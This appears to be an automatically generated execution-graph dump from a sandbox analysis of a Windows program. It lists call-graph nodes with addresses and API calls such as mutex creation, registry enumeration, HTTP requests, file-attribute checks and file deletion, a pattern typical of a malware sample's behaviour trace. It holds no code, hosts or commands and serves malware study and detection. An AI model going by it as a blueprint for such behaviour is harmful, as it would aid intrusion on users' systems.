                                                                                                                                                                                                                                          execution_graph 36825 69a54d GetFileAttributesA 36826 69a55d ISource 36825->36826 36827 69a628 ISource 36826->36827 36829 69a944 Concurrency::details::_CancellationTokenState::_RegisterCallback 36826->36829 36836 6a80c0 36827->36836 36831 69a960 Sleep CreateMutexA 36829->36831 36830 69a903 36833 69a98e 36831->36833 36832 69a9a7 36833->36832 36849 6c6629 GetPEB GetPEB IsInExceptionSpec 36833->36849 36835 69a9b0 36838 6a80de __InternalCxxFrameHandler 36836->36838 36840 6a8104 36836->36840 36838->36830 36839 6a81f3 36859 692480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 36839->36859 36841 6a8158 36840->36841 36842 6a817d 36840->36842 36847 6a8169 Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 36840->36847 36841->36839 36850 6ad3e2 36841->36850 36846 6ad3e2 Concurrency::details::ThreadScheduler::Create RtlAllocateHeap 36842->36846 36842->36847 36844 6a81f8 36846->36847 36848 6a81d0 ISource 36847->36848 36858 6a9270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36847->36858 36848->36830 36849->36835 36853 6ad3e7 Concurrency::details::ThreadScheduler::Create 36850->36853 36852 6ad401 36852->36847 36853->36852 36854 692480 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 36853->36854 36860 6c8be1 36853->36860 36856 6ad40d Concurrency::details::ResourceManager::ResourceManager 36854->36856 36864 6c38af RtlAllocateHeap ___std_exception_copy 36854->36864 36857 6924c3 36857->36847 36859->36844 36863 6cb04b __dosmaperr Concurrency::details::ThreadScheduler::Create 36860->36863 36861 6cb074 RtlAllocateHeap 36862 6cb087 __dosmaperr 36861->36862 36861->36863 36862->36853 36863->36861 36863->36862 36864->36857 36865 6a0cad 36866 6a0f13 ISource 36865->36866 36899 6a7a00 36866->36899 36868 6a0f34 36869 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36868->36869 36870 6a0f46 36869->36870 36910 6c67b7 36870->36910 36872 6a0f7f 36873 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36872->36873 36874 6a0f94 ISource __dosmaperr 36873->36874 36898 6a1168 36874->36898 36914 6c8ab6 36874->36914 36877 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36878 6a109d 36877->36878 36879 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36878->36879 36880 6a10b8 36879->36880 36881 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36880->36881 36882 6a10cd 36881->36882 36918 697590 Sleep 36882->36918 36884 6a10d6 36885 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36884->36885 36886 6a1100 36885->36886 36933 695c10 36886->36933 36888 6a1107 36889 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36888->36889 36890 6a111d 36889->36890 36891 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36890->36891 36892 6a1135 36891->36892 36893 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36892->36893 36894 6a114d 36893->36894 36895 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36894->36895 36896 6a115f 36895->36896 36940 69e530 36896->36940 36900 6a7a26 36899->36900 36901 6a7a2d 36900->36901 36902 6a7a62 36900->36902 36903 6a7a81 36900->36903 36901->36868 36904 6a7ab9 36902->36904 36905 6a7a69 36902->36905 36906 6ad3e2 Concurrency::details::ThreadScheduler::Create RtlAllocateHeap 36903->36906 36909 6a7a6f 6 library calls 36903->36909 37078 692480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 36904->37078 36908 6ad3e2 Concurrency::details::ThreadScheduler::Create RtlAllocateHeap 36905->36908 36906->36909 36908->36909 36909->36868 36911 6c67c3 ___scrt_is_nonwritable_in_current_image ___scrt_uninitialize_crt 36910->36911 36913 6c67cd __dosmaperr ___std_exception_copy 36911->36913 37079 6c6740 2 API calls 4 library calls 36911->37079 36913->36872 36915 6c8ad1 36914->36915 37080 6c8868 36915->37080 36917 6a104d 36917->36877 36917->36898 36919 69765e 36918->36919 36920 6975e3 36918->36920 36922 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36919->36922 37098 6ad111 SleepConditionVariableCS 36920->37098 36924 69767a 36922->36924 36923 6975ed 36923->36919 37099 6ad64e RtlAllocateHeap 36923->37099 36925 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36924->36925 36926 697693 36925->36926 36928 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36926->36928 36930 6976ac CreateThread Sleep 36928->36930 36929 697654 37100 6ad0c7 RtlWakeAllConditionVariable 36929->37100 36932 6976d9 ISource Concurrency::details::_CancellationTokenState::_RegisterCallback 36930->36932 37101 697430 36930->37101 36932->36884 37114 695940 36933->37114 36937 695c6a 37133 694b30 36937->37133 36939 695c7b ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 36939->36888 36941 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36940->36941 36942 69e576 36941->36942 36943 695c10 4 API calls 36942->36943 36944 69e581 36943->36944 36945 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36944->36945 36946 69e59c 36945->36946 36947 695c10 4 API calls 36946->36947 36948 69e5a7 36947->36948 37163 6a9280 36948->37163 36950 69e5ba 37168 6a8320 36950->37168 36952 69e5fc 37172 6a8220 36952->37172 36954 69e60d 36955 6a8320 RtlAllocateHeap 36954->36955 36956 69e61e 36955->36956 36957 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36956->36957 36958 69e7cb 36957->36958 36959 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36958->36959 36960 69e7e0 36959->36960 36961 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36960->36961 36962 69e7f2 36961->36962 37180 69be30 36962->37180 36964 69e7fe 36965 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36964->36965 36966 69e813 36965->36966 36967 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36966->36967 36968 69e82b 36967->36968 36969 695c10 4 API calls 36968->36969 36970 69e832 36969->36970 37205 698580 36970->37205 36972 69ea8f ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36972->36898 36973 69e83e Concurrency::details::_CancellationTokenState::_RegisterCallback 36973->36972 36974 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36973->36974 36975 69eb19 36974->36975 36976 695c10 4 API calls 36975->36976 36977 69eb21 36976->36977 37211 6a83c0 36977->37211 36979 69eb36 36980 6a8220 RtlAllocateHeap 36979->36980 36981 69eb45 GetFileAttributesA 36980->36981 36983 69eb62 36981->36983 36984 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36983->36984 36985 69ed60 36984->36985 36986 695c10 4 API calls 36985->36986 36987 69ed68 36986->36987 36988 6a83c0 RtlAllocateHeap 36987->36988 36989 69ed7d 36988->36989 36990 6a8220 RtlAllocateHeap 36989->36990 36991 69ed8c GetFileAttributesA 36990->36991 36995 69eda9 36991->36995 36993 69f699 ISource 36993->36898 36994 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36994->36995 36995->36993 36995->36994 36996 69f6cb Concurrency::details::_CancellationTokenState::_RegisterCallback 36995->36996 36997 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36996->36997 36998 69f727 36997->36998 36999 695c10 4 API calls 36998->36999 37000 69f72e 36999->37000 37001 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37000->37001 37002 69f741 37001->37002 37003 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37002->37003 37004 69f756 37003->37004 37005 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37004->37005 37006 69f76b 37005->37006 37007 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37006->37007 37008 69f77d 37007->37008 37009 69e530 11 API calls 37008->37009 37010 69f786 37009->37010 37011 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37010->37011 37012 69f7aa 37011->37012 37013 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37012->37013 37014 69f7ba 37013->37014 37015 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37014->37015 37016 69f7d7 37015->37016 37017 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37016->37017 37019 69f7f0 Concurrency::details::_CancellationTokenState::_RegisterCallback 37017->37019 37018 69f982 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37018->36898 37019->37018 37020 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37019->37020 37021 69fa04 37020->37021 37022 695c10 4 API calls 37021->37022 37023 69fa0b 37022->37023 37024 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37023->37024 37025 69fa1e 37024->37025 37026 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37025->37026 37027 69fa33 37026->37027 37028 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37027->37028 37029 69fa48 37028->37029 37030 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37029->37030 37031 69fa5a 37030->37031 37032 69e530 11 API calls 37031->37032 37034 69fa63 Concurrency::details::_CancellationTokenState::_RegisterCallback 37032->37034 37033 69fb35 ISource 37033->36898 37034->37033 37035 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37034->37035 37036 69fba5 37035->37036 37219 699580 37036->37219 37038 69fbb4 37234 699230 37038->37234 37040 69fbc3 37041 6a8320 RtlAllocateHeap 37040->37041 37042 69fbdb 37041->37042 37042->37042 37043 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37042->37043 37044 69fc8c 37043->37044 37045 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37044->37045 37046 69fca7 37045->37046 37047 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37046->37047 37048 69fcb9 37047->37048 37049 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37048->37049 37050 6a05d4 37049->37050 37051 695c10 4 API calls 37050->37051 37052 6a05db 37051->37052 37053 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37052->37053 37054 6a05f1 37053->37054 37055 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37054->37055 37056 6a0609 37055->37056 37057 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37056->37057 37058 6a0621 37057->37058 37059 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37058->37059 37060 6a0633 37059->37060 37061 69e530 11 API calls 37060->37061 37063 6a063c Concurrency::details::_CancellationTokenState::_RegisterCallback 37061->37063 37062 6a0880 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37062->36898 37063->37062 37064 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37063->37064 37065 6a0987 37064->37065 37066 695c10 4 API calls 37065->37066 37067 6a098e 37066->37067 37068 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37067->37068 37069 6a09a4 37068->37069 37070 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37069->37070 37071 6a09bc 37070->37071 37072 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37071->37072 37073 6a09d4 37072->37073 37074 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37073->37074 37075 6a12e0 37074->37075 37076 69e530 11 API calls 37075->37076 37077 6a12e9 37076->37077 37078->36909 37079->36913 37081 6c887a 37080->37081 37085 6c888f __dosmaperr ___std_exception_copy 37081->37085 37086 6c690a 37081->37086 37084 6c88bf 37084->37085 37094 6c6d52 GetPEB GetPEB RtlAllocateHeap __fassign __wsopen_s 37084->37094 37085->36917 37087 6c692a 37086->37087 37088 6c6921 37086->37088 37087->37088 37095 6ca671 GetPEB GetPEB __dosmaperr __freea IsInExceptionSpec 37087->37095 37088->37084 37090 6c694a 37096 6cb5fb GetPEB GetPEB __cftof 37090->37096 37092 6c6960 37097 6cb628 GetPEB GetPEB __cftof 37092->37097 37094->37084 37095->37090 37096->37092 37097->37088 37098->36923 37099->36929 37100->36919 37102 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37101->37102 37103 697465 37102->37103 37104 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37103->37104 37105 697478 37104->37105 37106 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37105->37106 37107 697488 37106->37107 37108 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37107->37108 37109 69749d 37108->37109 37110 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37109->37110 37111 6974b2 37110->37111 37112 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37111->37112 37113 6974c4 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37112->37113 37140 6a7f80 37114->37140 37116 69596b 37117 6959e0 37116->37117 37118 6a7f80 RtlAllocateHeap 37117->37118 37131 695a45 37118->37131 37119 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37119->37131 37120 695bdd __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37120->36937 37121 695c09 37155 6a8200 37121->37155 37123 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37123->37131 37124 695c0e 37125 695940 RtlAllocateHeap 37124->37125 37127 695c54 37125->37127 37128 6959e0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37127->37128 37129 695c6a 37128->37129 37130 694b30 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37129->37130 37132 695c7b ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37130->37132 37131->37119 37131->37120 37131->37121 37131->37123 37158 695730 RtlAllocateHeap ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37131->37158 37132->36937 37134 694dc2 37133->37134 37138 694b92 37133->37138 37134->36939 37136 694ce5 37136->37134 37162 6a8ca0 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::ThreadScheduler::Create 37136->37162 37138->37136 37160 6c6da6 GetPEB GetPEB RtlAllocateHeap __fassign 37138->37160 37161 6a8ca0 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::ThreadScheduler::Create 37138->37161 37142 6a7f9e Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37140->37142 37144 6a7fc7 37140->37144 37142->37116 37143 6a80b8 37154 692480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 37143->37154 37145 6a801b 37144->37145 37146 6a803e 37144->37146 37151 6a802c Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37144->37151 37145->37143 37149 6ad3e2 Concurrency::details::ThreadScheduler::Create RtlAllocateHeap 37145->37149 37150 6ad3e2 Concurrency::details::ThreadScheduler::Create RtlAllocateHeap 37146->37150 37146->37151 37148 6a80bd 37149->37151 37150->37151 37152 6a8095 ISource 37151->37152 37153 6a9270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37151->37153 37152->37116 37154->37148 37159 6ac1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37155->37159 37157 6a820a 37158->37131 37159->37157 37160->37138 37161->37138 37162->37136 37164 6a9294 37163->37164 37167 6a92a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 37164->37167 37249 6a94e0 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::ThreadScheduler::Create 37164->37249 37166 6a932b 37166->36950 37167->36950 37169 6a8339 37168->37169 37170 6a834d __InternalCxxFrameHandler 37169->37170 37250 6a8f40 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::ThreadScheduler::Create 37169->37250 37170->36952 37173 6a8248 37172->37173 37174 6a8292 37172->37174 37173->37174 37175 6a8251 37173->37175 37177 6a82a1 __InternalCxxFrameHandler 37174->37177 37251 6a8f40 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::ThreadScheduler::Create 37174->37251 37176 6a9280 RtlAllocateHeap 37175->37176 37179 6a825a 37176->37179 37177->36954 37179->36954 37181 69c281 37180->37181 37182 69be82 37180->37182 37183 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37181->37183 37182->37181 37184 69be96 Sleep InternetOpenW InternetConnectA 37182->37184 37189 69c22e ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37183->37189 37185 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37184->37185 37186 69bf18 37185->37186 37187 695c10 4 API calls 37186->37187 37188 69bf23 HttpOpenRequestA 37187->37188 37191 69bf4c ISource 37188->37191 37189->36964 37192 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37191->37192 37193 69bfb4 37192->37193 37194 695c10 4 API calls 37193->37194 37195 69bfbf 37194->37195 37196 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37195->37196 37197 69bfd8 37196->37197 37198 695c10 4 API calls 37197->37198 37199 69bfe3 HttpSendRequestA 37198->37199 37201 69c006 ISource 37199->37201 37202 69c08e InternetReadFile 37201->37202 37203 69c0b5 __InternalCxxFrameHandler 37202->37203 37204 69c13f InternetReadFile 37203->37204 37204->37203 37209 6986a0 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37205->37209 37210 6985d5 ISource 37205->37210 37206 698767 37208 6a8200 RtlAllocateHeap 37206->37208 37207 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37207->37210 37208->37209 37209->36973 37210->37206 37210->37207 37210->37209 37252 6a7760 37211->37252 37213 6a8439 37215 6a8454 __InternalCxxFrameHandler 37213->37215 37264 6a8f40 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::ThreadScheduler::Create 37213->37264 37218 6a84a8 __InternalCxxFrameHandler 37215->37218 37265 6a8f40 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception Concurrency::details::ThreadScheduler::Create 37215->37265 37217 6a84ee 37217->36979 37218->36979 37220 6995d4 37219->37220 37221 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37220->37221 37222 69961c 37221->37222 37223 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37222->37223 37226 699635 ISource 37223->37226 37224 69979f 37227 6997fe 37224->37227 37228 6998e0 37224->37228 37225 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37225->37226 37226->37224 37226->37225 37226->37228 37229 695c10 4 API calls 37226->37229 37232 699834 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37226->37232 37233 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37226->37233 37230 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37227->37230 37231 6a8200 RtlAllocateHeap 37228->37231 37229->37226 37230->37232 37231->37232 37232->37038 37233->37226 37235 699284 37234->37235 37236 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37235->37236 37237 6992cc 37236->37237 37238 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37237->37238 37244 6992e5 ISource 37238->37244 37239 69944f 37241 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37239->37241 37240 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37240->37244 37245 6994c6 ISource Concurrency::details::_CancellationTokenState::_RegisterCallback 37241->37245 37242 695c10 4 API calls 37242->37244 37243 699543 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37243->37040 37244->37239 37244->37240 37244->37242 37244->37245 37246 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37244->37246 37245->37243 37247 6a8200 RtlAllocateHeap 37245->37247 37246->37244 37248 699578 37247->37248 37249->37166 37250->37170 37251->37177 37253 6a777b 37252->37253 37263 6a7864 ISource std::_Rethrow_future_exception 37252->37263 37257 6a77ea 37253->37257 37258 6a7811 37253->37258 37262 6a77fb Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37253->37262 37253->37263 37255 6a78f6 37267 692480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 37255->37267 37257->37255 37260 6ad3e2 Concurrency::details::ThreadScheduler::Create RtlAllocateHeap 37257->37260 37261 6ad3e2 Concurrency::details::ThreadScheduler::Create RtlAllocateHeap 37258->37261 37258->37262 37259 6a78fb 37260->37262 37261->37262 37262->37263 37266 6a9270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37262->37266 37263->37213 37264->37215 37265->37217 37267->37259 37280 6ad762 37289 6ad76e ___scrt_is_nonwritable_in_current_image IsInExceptionSpec ___scrt_release_startup_lock 37280->37289 37281 6ad8ce ___scrt_fastfail 37316 6c6629 GetPEB GetPEB IsInExceptionSpec 37281->37316 37283 6ad8db 37317 6c65ed GetPEB GetPEB IsInExceptionSpec 37283->37317 37285 6ad8e3 ___security_init_cookie 37286 6ad8e9 __scrt_common_main_seh 37285->37286 37287 6ad83f 37299 6c95bc 37287->37299 37289->37281 37289->37287 37298 6ad7be 37289->37298 37315 6c6603 2 API calls 4 library calls 37289->37315 37291 6ad845 37303 6a6d30 37291->37303 37300 6c95ca 37299->37300 37301 6c95c5 37299->37301 37300->37291 37318 6c9320 37301->37318 37342 69a960 Sleep CreateMutexA 37303->37342 37307 6a6d45 37308 69d6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37307->37308 37309 6a6d4a 37308->37309 37310 6a4fc0 6 API calls 37309->37310 37311 6a6d4f 37310->37311 37312 696020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 37311->37312 37313 6a6d54 37312->37313 37314 696020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 37313->37314 37314->37313 37315->37287 37316->37283 37317->37285 37319 6c9329 37318->37319 37320 6c9336 37318->37320 37319->37320 37322 6c934c 37319->37322 37320->37300 37323 6c9358 37322->37323 37324 6c9355 37322->37324 37329 6ce669 37323->37329 37324->37320 37328 6c9364 __freea 37328->37320 37330 6c935f 37329->37330 37331 6ce672 37329->37331 37335 6cea0a 37330->37335 37339 6ca72e GetPEB GetPEB __dosmaperr __freea IsInExceptionSpec 37331->37339 37333 6ce695 37340 6ce4b0 3 API calls 4 library calls 37333->37340 37336 6cea18 __cftof 37335->37336 37338 6cea4a __cftof __freea 37336->37338 37341 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37336->37341 37338->37328 37339->37333 37340->37330 37341->37338 37344 69a98e 37342->37344 37343 69a9a7 37347 69ce40 37343->37347 37344->37343 37352 6c6629 GetPEB GetPEB IsInExceptionSpec 37344->37352 37346 69a9b0 37348 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37347->37348 37349 69ce92 37348->37349 37350 695c10 4 API calls 37349->37350 37351 69ce9d 37350->37351 37352->37346 37353 6c6a44 37354 6c6a5c 37353->37354 37355 6c6a52 37353->37355 37364 6c698d 37354->37364 37356 6cb655 DeleteFileW 37355->37356 37358 6c6a59 37356->37358 37359 6c6a76 37367 6c68ed 37359->37367 37363 6c6a8a __freea 37365 6c690a __cftof 2 API calls 37364->37365 37366 6c699f __wsopen_s 37365->37366 37366->37359 37372 6c683b 37367->37372 37369 6c6905 37369->37363 37370 6cb655 DeleteFileW 37369->37370 37371 6cb667 __dosmaperr 37370->37371 37371->37363 37373 6c6863 37372->37373 37378 6c6849 __dosmaperr __fassign __wsopen_s 37372->37378 37374 6c686a 37373->37374 37376 6c6889 __fassign 37373->37376 37374->37378 37379 6c69e6 RtlAllocateHeap __wsopen_s 37374->37379 37376->37378 37380 6c69e6 RtlAllocateHeap __wsopen_s 37376->37380 37378->37369 37379->37378 37380->37378 37381 6cc1c4 37382 6cc1ee 37381->37382 37383 6cc259 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __dosmaperr ___std_exception_copy 37381->37383 37382->37383 37385 6d292b 37382->37385 37386 6d2937 ___scrt_is_nonwritable_in_current_image IsInExceptionSpec 37385->37386 37388 6d295c 37386->37388 37389 6d284d 37386->37389 37388->37383 37390 6d2899 37389->37390 37397 6d28a0 __freea 37390->37397 37437 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37390->37437 37392 6d2910 37396 6d290d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __freea 37392->37396 37422 6d26f2 37392->37422 37394 6d2907 37398 6d2517 37394->37398 37396->37388 37397->37392 37397->37394 37399 6d2526 __freea 37398->37399 37419 6d26c8 37399->37419 37421 6d2680 ___std_exception_copy 37399->37421 37438 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37399->37438 37401 6d2744 __freea 37404 6d274f GetTimeZoneInformation 37401->37404 37402 6d2842 ___std_exception_copy 37411 6d28a0 __freea 37402->37411 37443 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37402->37443 37410 6d276b 37404->37410 37415 6d27be __cftof 37404->37415 37405 6d2910 37406 6d26f2 4 API calls 37405->37406 37409 6d290d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __freea 37405->37409 37406->37409 37407 6d2907 37408 6d2517 4 API calls 37407->37408 37408->37409 37409->37396 37442 6cef17 GetPEB GetPEB __cftof _unexpected 37410->37442 37411->37405 37411->37407 37413 6d25b6 __freea ___std_exception_copy 37413->37419 37413->37421 37439 6c8bbe GetPEB GetPEB RtlAllocateHeap 37413->37439 37415->37396 37416 6d262a 37416->37421 37440 6c8bbe GetPEB GetPEB RtlAllocateHeap 37416->37440 37418 6d2651 37418->37421 37441 6c8bbe GetPEB GetPEB RtlAllocateHeap 37418->37441 37419->37396 37421->37401 37421->37402 37421->37419 37423 6d2701 37422->37423 37424 6d2744 __freea 37423->37424 37425 6d2842 ___std_exception_copy 37423->37425 37427 6d274f GetTimeZoneInformation 37424->37427 37434 6d28a0 __freea 37425->37434 37445 6cb04b RtlAllocateHeap __dosmaperr Concurrency::details::ThreadScheduler::Create 37425->37445 37433 6d276b 37427->37433 37436 6d27be __cftof 37427->37436 37428 6d2910 37429 6d26f2 4 API calls 37428->37429 37432 6d290d __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __freea 37428->37432 37429->37432 37430 6d2907 37431 6d2517 4 API calls 37430->37431 37431->37432 37432->37396 37444 6cef17 GetPEB GetPEB __cftof _unexpected 37433->37444 37434->37428 37434->37430 37436->37396 37437->37397 37438->37413 37439->37416 37440->37418 37441->37421 37442->37415 37443->37411 37444->37436 37445->37434 37446 6a6d00 CreateThread 37447 6a6d20 Sleep 37446->37447 37448 6a6c70 37446->37448 37447->37447 37452 6a6ca0 37448->37452 37449 695c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37449->37452 37450 6a7a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37450->37452 37452->37449 